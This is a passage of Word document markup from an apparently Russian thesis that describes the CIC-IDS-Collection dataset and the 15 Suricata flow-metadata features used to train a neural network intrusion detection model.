              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="784D254E"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Более 70 метаданных потоков (без полезной нагрузки пакетов)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00660894" w14:paraId="7463A54B" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="986"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="218F77B5"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Классы трафика</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3487" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17F02FBA"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Бинарная (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00660894">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Normal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00660894">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00660894">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Attack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00660894">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">) и </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00660894">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>мультиклассовая</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00660894">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (детализация по типам атак) разметка</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00660894" w14:paraId="40C1B7CF" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="940"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC92D53"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Лицензия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3487" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19DCA564"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Открытая лицензия для научно-исследовательских целей (CC BY-NC-SA 4.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00660894" w14:paraId="05E47DE0" w14:textId="77777777" w:rsidTr="003C0349">
        <w:trPr>
          <w:trHeight w:val="1036"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62B548CE"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Предварительная обработка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3487" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FB6E10C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00660894" w:rsidRDefault="008E0171" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00660894">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="1D1D1F"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Очистка от некорректных признаков, гармонизация именования классов, удаление дубликатов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29BDBF29" w14:textId="43DB89B9" w:rsidR="008E0171" w:rsidRPr="00352036" w:rsidRDefault="008E0171" w:rsidP="003C0349">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Х</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>арактеристика датасета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5B57FE"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1E4B8BC9" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C853A6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00660894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Выбранный источник представляет собой коллаборацию нескольких независимых коллекций данных, объединённых с целью устранения дисбаланса и удаления ошибочных признаков, выявленных в независимых исследованиях. Использование данного набора позволяет исключить этап самостоятельной генерации атакующего трафика в лабораторной сети, что снижает риски нарушения законодательства РФ в области информационной безопасности и обеспечивает высокую чистоту экспериментальных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533E4FB2" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C853A6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188449EA" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C853A6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26145F37" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C853A6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76958636" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00C853A6" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="614ABF86" w14:textId="2AC2B94B" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009D45A4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc231673290"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="005135C4">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005135C4">
        <w:t xml:space="preserve"> Обучение и валидация нейросетевой модели на реальном и синтетическом трафике</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="6BE5CBA6" w14:textId="77777777" w:rsidR="006605C1" w:rsidRPr="005135C4" w:rsidRDefault="006605C1" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA265E7"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C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В соответствии с архитектурой модуля, описанной в разделе 2.3, для обучения нейросетевой модели использован набор данных CIC-IDS-Collection объёмом 9 167 581 записей. Распределение классов в датасете составило: легитимный трафик — 7 186 189 записей (78,4%), атакующий трафик — 1 981 392 записи (21,6%). Такое соотношение является типичным для реальных корпоративных сетей и позволяет обучить модель на репрезентативной выборке без искусственного выравнивания классов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C09CF" w14:textId="7EEED2A8"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C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевой задачей этапа подготовки данных являлось формирование вектора признаков, вычисляемых исключительно из метаданных, доступных в логах </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> формата EVE JSON. Это требование обусловлено необходимостью обеспечения совместимости между этапом обучения и этапом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">использования </w:t>
      </w:r>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в плагине. Итоговый вектор признаков состоит из 15 элементов, представленных в таблице 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C853A6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9E49F" w14:textId="77777777" w:rsidR="002E66B7" w:rsidRPr="004B1B09" w:rsidRDefault="002E66B7" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6481418F" w14:textId="4BE70244" w:rsidR="008E0171" w:rsidRPr="007818DC" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Таблица 1</w:t>
      </w:r>
      <w:r w:rsidR="00B94753">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Вектор признаков</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="96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2486"/>
        <w:gridCol w:w="4318"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="3C317AC5" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="630"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64AD1384"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Признак</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ED29993"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Источник в EVE JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505A8873"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Описание</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="202E8CEA" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="422"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E4D3BC9" w14:textId="2BE5C1FB" w:rsidR="00B94753" w:rsidRPr="00B94753"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B94753">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43FB37AE" w14:textId="0E844C26" w:rsidR="00B94753" w:rsidRPr="00B94753"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B94753">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1793E7C1" w14:textId="74C2562A" w:rsidR="00B94753" w:rsidRPr="00B94753"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B94753">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="2FA359D6" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="898"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12DC1C16"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duration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="212E37FC"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flow.start</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flow.end</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="052676AC"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Длительность сетевой сессии (с)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="3D5D9469" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="662"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="086F924B"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fwd_pkts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B4BF879"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flow.pkts</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>_toserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C8820C2"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Количество пакетов от источника</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B94753" w:rsidRPr="007818DC" w14:paraId="61D56941" w14:textId="77777777" w:rsidTr="00B94753">
        <w:trPr>
          <w:trHeight w:val="750"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2825" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60061188"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bwd_pkts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2486" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63DB80F8"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proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>flow.pkts</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007818DC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>_toclient</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4318" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
